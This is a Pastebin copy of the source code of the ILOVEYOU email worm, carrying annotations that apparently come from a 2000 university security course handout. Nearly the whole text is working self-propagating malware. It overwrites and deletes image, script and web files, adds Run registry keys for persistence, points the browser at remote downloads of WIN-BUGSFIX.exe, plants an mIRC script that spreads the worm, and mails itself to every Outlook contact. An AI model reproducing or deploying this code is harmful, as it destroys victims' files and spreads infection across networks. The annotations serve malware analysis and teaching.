Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Source Code to the ILOVEYOU Worm
- rem barok -loveletter(vbe) <i hate go to school>
- rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
- rem ----------------------------------------
- rem INVOKING SCRIPT
- rem
- rem Effect: Save this in memory and run main
- rem
- rem ----------------------------------------
- On Error Resume Next
- dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
- rem
- eq=""
- ctr=0
- rem
- rem put the contents of this script into vbscopy for later use
- rem
- Set fso = CreateObject("Scripting.FileSystemObject")
- set file = fso.OpenTextFile(WScript.ScriptFullname,1)
- vbscopy=file.ReadAll
- main()
- rem ----------------------------------------
- rem main
- rem
- rem Effect: do invokes the relevant routines after setup
- rem
- rem ----------------------------------------
- sub main()
- On Error Resume Next
- dim wscr,rr
- rem
- rem set the timeout to 0
- rem
- set wscr=CreateObject("WScript.Shell")
- rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Time-
- out")
- if (rr>=1) then
- wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Time-
- out",0,"REG_DWORD"
- end if
- rem
- rem set dirwin to root folder of Windows; copy this script into
- rem MSKernel32.vbs and LOVE-LETTER-FOR-YOU.TXT.vbs in this directory
- rem set dirsystem to Windows system folder; copy this script into
- rem Win32DLL.vbs inthat directory
- rem set dirtemp to Windows folder used for temp files
- rem
- Set dirwin = fso.GetSpecialFolder(0)
- Set dirsystem = fso.GetSpecialFolder(1)
- Set dirtemp = fso.GetSpecialFolder(2)
- Set c = fso.GetFile(WScript.ScriptFullName)
- c.Copy(dirsystem&"\MSKernel32.vbs")
- c.Copy(dirwin&"\Win32DLL.vbs")
- c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
- rem
- rem go!
- May 9, 2000 ECS 253—Spring 2000 2
- rem
- regruns()
- html()
- spreadtoemail()
- listadriv()
- end sub
- rem ----------------------------------------
- rem regruns
- rem
- rem Effect: If WinFAT32.exe exists in the system directory, attempt to
- rem download the program WIN-BUGSFIX.exe into the IE download directory.
- rem On success, set the IE start page to a blank screen (about:blank)
- rem
- rem ----------------------------------------
- sub regruns()
- On Error Resume Next
- Dim num,downread
- rem
- rem Set the following keys:
- rem HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
- rem to <dirsystem>\MSKernel32.vbs
- rem HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
- rem to <dirwin>\Win32DLL.vbs
- rem
- regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dir-
- system&"\MSKernel32.vbs"
- regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunSer-
- vices\Win32DLL",dirwin&"\Win32DLL.vbs"
- rem
- rem Get the directory into which IE downloads stuff; use c:\ if not set
- rem
- downread=""
- downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
- if (downread="") then
- downread="c:\"
- end if
- rem
- rem If <dirsystem>\WinFAT32.exe does not exist, pick a random page
- rem to get it from and download it
- rem
- if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
- Randomize
- num = Int((4 * Rnd) + 1)
- if num = 1 then
- regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyi-
- net.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-
- BUGSFIX.exe"
- elseif num = 2 then
- regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyi-
- net.net/~angelcat/
- skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
- elseif num = 3 then
- regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyi-
- net.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
- elseif num = 4 then
- regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyi-
- net.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdg-
- lkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
- end if
- May 9, 2000 ECS 253—Spring 2000 3
- end if
- rem
- rem If the payload is there, set the keys:
- rem HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
- rem to <IEdownloaddirorc:\>\WIN-BUGSFIX.exe
- rem and set the startup page for IE to be blank
- rem
- if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
- regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGS-
- FIX",downread&"\WIN-BUGSFIX.exe"
- regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
- Page","about:blank"
- end if
- end sub
- rem ----------------------------------------
- rem listadriv
- rem
- rem Effect: infect all folders, files that qualify for infection
- rem
- rem ----------------------------------------
- sub listadriv
- On Error Resume Next
- Dim d,dc,s
- rem
- rem get the system drives
- rem
- Set dc = fso.Drives
- rem
- rem If the drive is remote (3) or fixed (2),
- rem call infectfiles on each folder in the tree
- rem
- For Each d in dc
- If d.DriveType = 2 or d.DriveType=3 Then
- folderlist(d.path&"\")
- end if
- Next
- rem no idea what this does; listadriv is a sub, not
- rem a function, and s is uninitialized!
- listadriv = s
- end sub
- rem ----------------------------------------
- rem infectfiles
- rem
- rem Effect: (1) create copies of this thing:
- rem * overwrite vbe, vbs files
- rem * delete js, jse, css, wsh, sct, ha
- rem files, put copies in files with same base name
- rem and vbs extension
- rem * delete jpg, jpeg files, put copies in files
- rem with same name and vbs extension
- rem * mp2, mp3 files, put copies in files with same
- rem name and vbs extension, and hide original files
- rem (2) create/insert a Trojan horse to be invoked when
- rem IRC is run; this seems to send the worm on all
- rem channels when you invoke IRC
- rem
- rem ----------------------------------------
- sub infectfiles(folderspec)
- On Error Resume Next
- May 9, 2000 ECS 253—Spring 2000 4
- dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
- rem
- rem get the files in the folder
- rem
- set f = fso.GetFolder(folderspec)
- set fc = f.Files
- rem
- rem loop through the files
- rem
- for each f1 in fc
- rem
- rem get the file name (s) and the extension (ext)
- rem
- ext=fso.GetExtensionName(f1.path)
- ext=lcase(ext)
- s=lcase(f1.name)
- rem
- rem what it does depends upon the file extension
- rem
- if (ext="vbs") or (ext="vbe") then
- rem it's visual basic
- rem write the contents of WScript.Scriptfullname into the file
- rem (overwrites what is there)
- set ap=fso.OpenTextFile(f1.path,2,true)
- ap.write vbscopy
- ap.close
- elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta")
- then
- rem it's a web-based language (javascript, cascading style sheet, etc.)
- rem write the contents of WScript.Scriptfullname into a file named
- rem the same but with a "vbs" extension; the original file is deleted
- set ap=fso.OpenTextFile(f1.path,2,true)
- ap.write vbscopy
- ap.close
- bname=fso.GetBaseName(f1.path)
- set cop=fso.GetFile(f1.path)
- cop.copy(folderspec&"\"&bname&".vbs")
- fso.DeleteFile(f1.path)
- elseif(ext="jpg") or (ext="jpeg") then
- rem it's a jpeg (picture) file
- rem write the contents of WScript.Scriptfullname into a file named
- rem the same but with a "vbs" extension (delete the original file)
- set ap=fso.OpenTextFile(f1.path,2,true)
- ap.write vbscopy
- ap.close
- set cop=fso.GetFile(f1.path)
- cop.copy(f1.path&".vbs")
- fso.DeleteFile(f1.path)
- elseif(ext="mp3") or (ext="mp2") then
- rem it's an mpeg (movie) file
- rem put the contents of WScript.Scriptfullname into a file with the
- rem same path name but with a "vbs" extension
- set mp3=fso.CreateTextFile(f1.path&".vbs")
- mp3.write vbscopy
- mp3.close
- rem this looks like it's trying to hide the file
- rem attribute 0 is normal, 2 is hidden
- rem if the file's attribute is not normal, the resulting
- rem attribute seems to be meaningless
- May 9, 2000 ECS 253—Spring 2000 5
- set att=fso.GetFile(f1.path)
- att.attributes=att.attributes+2
- end if
- rem
- rem Now go for IRC; this is done once per folder
- rem
- if (eq<>folderspec) then
- if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or
- (s="mirc.hlp") then
- rem if the folder contains any of these,
- rem set a Trojan to trigger when mIRC is next invoked
- set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
- rem this script seems to send the worm file whenever
- rem you join an IRC channel
- scriptini.WriteLine "[script]"
- scriptini.WriteLine ";mIRC Script"
- scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
- scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
- scriptini.WriteLine ";"
- scriptini.WriteLine ";Khaled Mardam-Bey"
- scriptini.WriteLine ";http://www.mirc.com"
- scriptini.WriteLine ";"
- scriptini.WriteLine "n0=on 1:JOIN:#:{"
- scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
- scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
- scriptini.WriteLine "n3=}"
- scriptini.close
- eq=folderspec
- end if
- end if
- next
- end sub
- rem ----------------------------------------
- rem folderlist
- rem
- rem Effect: Recurse throughout all subfolders
- rem
- rem ----------------------------------------
- sub folderlist(folderspec)
- On Error Resume Next
- dim f,f1,sf
- rem
- rem Get the subfolders in this folder
- rem
- set f = fso.GetFolder(folderspec)
- set sf = f.SubFolders
- rem
- rem call infectfiles on each subfolder and recurse
- rem
- for each f1 in sf
- infectfiles(f1.path)
- folderlist(f1.path)
- next
- end sub
- rem ----------------------------------------
- rem regcreate
- rem
- rem Effect: Change a key in the registry
- rem
- May 9, 2000 ECS 253—Spring 2000 6
- rem ----------------------------------------
- sub regcreate(regkey,regvalue)
- Set regedit = CreateObject("WScript.Shell")
- regedit.RegWrite regkey,regvalue
- end sub
- rem ----------------------------------------
- rem regget
- rem
- rem Effect: Return the value of a key in the registry
- rem
- rem ----------------------------------------
- function regget(value)
- Set regedit = CreateObject("WScript.Shell")
- regget=regedit.RegRead(value)
- end function
- rem ----------------------------------------
- rem fileexist
- rem
- rem Effect: Return 0 if the file exists, 1 if not
- rem
- rem ----------------------------------------
- function fileexist(filespec)
- On Error Resume Next
- dim msg
- if (fso.FileExists(filespec)) Then
- msg = 0
- else
- msg = 1
- end if
- fileexist = msg
- end function
- rem ----------------------------------------
- rem folderexist
- rem
- rem Effect: Return 0 if the folder exists, 1 if not
- rem ??? bogosity -- look at the return statement
- rem ??? also, method GetFolderExists doesn't exist ...
- rem ----------------------------------------
- function folderexist(folderspec)
- On Error Resume Next
- dim msg
- if (fso.GetFolderExists(folderspec)) then
- msg = 0
- else
- msg = 1
- end if
- fileexist = msg
- end function
- rem ----------------------------------------
- rem spreadtoemail
- rem
- rem Effect: send everyone on this user's address book
- rem a copy of the worm as an attachment to a letter
- rem with the subject: "ILOVEYOU" and the body:
- rem "kindly check the attached LOVELETTER coming from me."
- rem ----------------------------------------
- sub spreadtoemail()
- On Error Resume Next
- dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
- May 9, 2000 ECS 253—Spring 2000 7
- rem
- rem access Outlook and get the address lists
- rem
- set regedit=CreateObject("WScript.Shell")
- set out=WScript.CreateObject("Outlook.Application")
- set mapi=out.GetNameSpace("MAPI")
- rem
- rem iterate over the address lists
- rem
- for ctrlists=1 to mapi.AddressLists.Count
- rem get this address list
- set a=mapi.AddressLists(ctrlists)
- x=1
- rem see if there is a corresponding windows address book
- regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
- if (regv="") then
- regv=1
- end if
- rem if there are entries in it, loop through them
- if (int(a.AddressEntries.Count)>int(regv)) then
- for ctrentries=1 to a.AddressEntries.Count
- rem get the entry and see if there is a reg key with their
- rem name in the WAB
- malead=a.AddressEntries(x)
- regad=""
- regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
- rem nope -- create a letter and send it out
- rem the worm is an attachment
- if (regad="") then
- set male=out.CreateItem(0)
- male.Recipients.Add(malead)
- male.Subject = "ILOVEYOU"
- male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
- male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
- male.Send
- rem now create the key
- regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
- end if
- rem go on to next address
- x=x+1
- next
- rem now put the number of entries into the registry key
- regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
- else
- rem key already exists;
- rem put the number of entries into the registry key
- regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
- end if
- next
- rem
- rem clobber the objects
- rem
- Set out=Nothing
- Set mapi=Nothing
- end sub
- rem ----------------------------------------
- rem html
- rem
- rem Effect: build a web page which, when invoked, will
- May 9, 2000 ECS 253—Spring 2000 8
- rem create this little nasty and run it
- rem it's put into the web page named
- rem <dirsys>\LOVE-LETTER-FOR-YOU.HTM
- rem ----------------------------------------
- sub html
- On Error Resume Next
- dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
- rem
- rem this part is the HTML header that invokes a Java script to
- rem create a window; what follows is a variable to hold the (modified)
- rem form of this script
- rem
- dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-
- @BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
- "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-?
- Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
- "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
- "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-
- #,#-#main#-#)@-@ "&vbcrlf& _
- "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@
- BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
- "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>-
- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
- "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------
- z----------<?-?MARQUEE> "&vbcrlf& _
- "<?-?BODY><?-?HTML>"&vbcrlf& _
- "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
- "<!--?-??-?"&vbcrlf& _
- "if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;win-
- dow.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
- "?-??-?-->"&vbcrlf& _
- "<?-?SCRIPT>"&vbcrlf& _
- "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
- "<!--"&vbcrlf& _
- "on error resume next"&vbcrlf& _
- "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
- "aw=1"&vbcrlf& _
- "code="
- rem
- rem this part is the visual basic script that decodes the encoded
- rem script and runs it, when invoked by ie; it's appended to the
- rem encoded part and put into the page
- rem
- dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
- "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
- "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
- "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
- "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
- "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
- "wri.write code4"&vbcrlf& _
- "wri.close"&vbcrlf& _
- "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
- "if (err.number=424) then"&vbcrlf& _
- "aw=0"&vbcrlf& _
- "end if"&vbcrlf& _
- "if (aw=1) then"&vbcrlf& _
- "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
- "window.close"&vbcrlf& _
- "end if"&vbcrlf& _
- May 9, 2000 ECS 253—Spring 2000 9
- "end if"&vbcrlf& _
- "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
- "regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-
- ^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
- "?-??-?-->"&vbcrlf& _
- "<?-?SCRIPT>"
- dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
- dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
- dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
- dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
- dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
- dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
- dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
- dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
- rem
- rem Open this script
- rem
- set fso=CreateObject("Scripting.FileSystemObject")
- set c=fso.OpenTextFile(WScript.ScriptFullName,1)
- rem
- rem Read contents in and break it into lines
- rem l1 is the number of lines
- rem
- lines=Split(c.ReadAll,vbcrlf)
- l1=ubound(lines)
- for n=0 to ubound(lines)
- rem map: ' to [-[, " ]-], and \ to %-%
- lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
- lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
- lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
- rem put " ... " around lines, and append &vbcrlf& _ to all
- rem but the last line
- if (l1=n) then
- lines(n)=chr(34)+lines(n)+chr(34)
- else
- lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
- end if
- next
- rem Create <dirsys>\LOVE-LETTER-FOR-YOU.HTM and open it for
- rem writing; then put the modified script into it with the
- rem HTML header and trailer
- rem
- set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
- b.close
- set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
- d.write dt5
- d.write join(lines,vbcrlf)
- d.write vbcrlf
- d.write dt6
- d.close
- end sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement